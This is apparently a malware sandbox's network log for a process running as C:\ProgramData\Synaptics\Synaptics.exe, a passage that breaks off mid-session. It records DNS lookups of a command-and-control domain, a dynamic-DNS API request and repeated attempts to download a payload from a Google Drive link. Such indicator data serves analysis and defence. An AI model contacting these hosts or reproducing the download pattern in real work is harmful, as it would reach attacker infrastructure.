Dec 24, 2024 22:11:33.915239096 CET | 192.168.2.4 | 1.1.1.1 | 0x87f9 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:38.555986881 CET | 192.168.2.4 | 1.1.1.1 | 0x3837 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:44.369179964 CET | 192.168.2.4 | 1.1.1.1 | 0x6af6 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:49.025343895 CET | 192.168.2.4 | 1.1.1.1 | 0x5f2b | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:54.869601965 CET | 192.168.2.4 | 1.1.1.1 | 0x39c5 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:59.531586885 CET | 192.168.2.4 | 1.1.1.1 | 0x6625 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:12:05.352777004 CET | 192.168.2.4 | 1.1.1.1 | 0xf77b | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:12:10.025399923 CET | 192.168.2.4 | 1.1.1.1 | 0x1eb9 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:12:15.899920940 CET | 192.168.2.4 | 1.1.1.1 | 0x43f8 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 24, 2024 22:11:07.599659920 CET | 1.1.1.1 | 192.168.2.4 | 0xf82 | No error (0) | docs.google.com | | 142.250.181.14 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:08.462591887 CET | 1.1.1.1 | 192.168.2.4 | 0x7b74 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:08.828917027 CET | 1.1.1.1 | 192.168.2.4 | 0xfce1 | No error (0) | freedns.afraid.org | | 69.42.215.252 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:10.791969061 CET | 1.1.1.1 | 192.168.2.4 | 0x212e | No error (0) | drive.usercontent.google.com | | 142.250.181.1 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:13.053833961 CET | 1.1.1.1 | 192.168.2.4 | 0x8bb9 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:17.728652954 CET | 1.1.1.1 | 192.168.2.4 | 0x7611 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:23.553342104 CET | 1.1.1.1 | 192.168.2.4 | 0x9438 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:28.227714062 CET | 1.1.1.1 | 192.168.2.4 | 0xdc0d | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:34.053229094 CET | 1.1.1.1 | 192.168.2.4 | 0x87f9 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:38.696131945 CET | 1.1.1.1 | 192.168.2.4 | 0x3837 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:44.505985022 CET | 1.1.1.1 | 192.168.2.4 | 0x6af6 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:49.164690971 CET | 1.1.1.1 | 192.168.2.4 | 0x5f2b | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:55.007740974 CET | 1.1.1.1 | 192.168.2.4 | 0x39c5 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:59.668736935 CET | 1.1.1.1 | 192.168.2.4 | 0x6625 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:12:00.327739000 CET | 1.1.1.1 | 192.168.2.4 | 0x1c68 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 24, 2024 22:12:00.327739000 CET | 1.1.1.1 | 192.168.2.4 | 0x1c68 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:12:05.490787983 CET | 1.1.1.1 | 192.168.2.4 | 0xf77b | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:12:10.162976980 CET | 1.1.1.1 | 192.168.2.4 | 0x1eb9 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:12:16.037115097 CET | 1.1.1.1 | 192.168.2.4 | 0x43f8 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
                                                                                        • docs.google.com
                                                                                        • drive.usercontent.google.com
                                                                                        • freedns.afraid.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49740 | 69.42.215.252 | 80 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
Dec 24, 2024 22:11:08.985790968 CET | 154 | OUT | GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                        User-Agent: MyApp
                                                                                        Host: freedns.afraid.org
                                                                                        Cache-Control: no-cache
Dec 24, 2024 22:11:10.644807100 CET | 243 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Tue, 24 Dec 2024 21:11:10 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        X-Cache: MISS
                                                                                        Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1fERROR: Could not authenticate.0
Dec 24, 2024 22:11:10.646573067 CET | 243 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Tue, 24 Dec 2024 21:11:10 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        X-Cache: MISS
                                                                                        Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1fERROR: Could not authenticate.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49735 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 21:11:09 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
2024-12-24 21:11:10 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:09 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-3n0AdwPdz2jWFFll8GGpxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49734 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 21:11:09 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
2024-12-24 21:11:10 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:09 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-557ev4-C_DIPLuXK2IvGyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49744 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 21:11:12 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
2024-12-24 21:11:13 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:12 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-cn-okkAgP9u5_BChx6BLcQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49745 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 21:11:12 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
2024-12-24 21:11:13 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:12 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-k0GksqgdgNqqckbF2R_k8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49747 | 142.250.181.1 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 21:11:12 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-12-24 21:11:13 UTC | 1595 | IN | HTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC557Hv_HOLpf4KjtxE7VNh1ywnGJfmVys6STkpqu9Iz2nxNsMK6VCVvjEHzblZJkL5G
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:13 GMT
                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-BAq6LDjmjgpTjI_xCI-wpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Set-Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR; expires=Wed, 25-Jun-2025 21:11:13 GMT; path=/; domain=.google.com; HttpOnly
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:11:13 UTC | 1595 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LI2BNjuG-9gKjWjk524IIg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                        2024-12-24 21:11:13 UTC | 57 | IN | Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        5 | 192.168.2.4 | 49746 | 142.250.181.1 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:12 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-12-24 21:11:13 UTC | 1602 | IN | HTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC4hScLdnGCuYWqVYuk5Mf1tbrmYb90l-I7PFbRASJwmx8IGzxOKeq15URZwelwNMBtnR3CJgfM
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:13 GMT
                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-8BJ9zOTNVeEpSCIbFV21XA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Set-Cookie: NID=520=OM-dp6bhkhtg79xklAD4xIA-z7FHNk5sgiYtwe9uQU4WfMFr402V9JwNDcq_k6qFgzr7UHEiUo4sL27axlfLKU20pwx-trh7K4VC0SV1oqLt7LhN0lgJgXY86j07HEtnK1kbCobYTpp6nJAQW0XvlryROAv_MUj0QkOxSMMfa_aW60phebG1418L; expires=Wed, 25-Jun-2025 21:11:13 GMT; path=/; domain=.google.com; HttpOnly
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:11:13 UTC | 1602 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1XF0OOGOUTTqhRHKHTxZFw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                        2024-12-24 21:11:13 UTC | 50 | IN | Data Ascii: is server. <ins>Thats all we know.</ins></main>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        6 | 192.168.2.4 | 49758 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:16 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:17 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:16 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-PU7lGoFl5yBCrh9AYsK2Cg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        7 | 192.168.2.4 | 49759 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:16 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:17 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:16 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-fsTaGoMIPFssAI0s1KFo6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        8 | 192.168.2.4 | 49764 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:19 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:20 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:19 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-onFo5sRgPaFP78ZjLeFwTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        9 | 192.168.2.4 | 49766 | 142.250.181.1 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
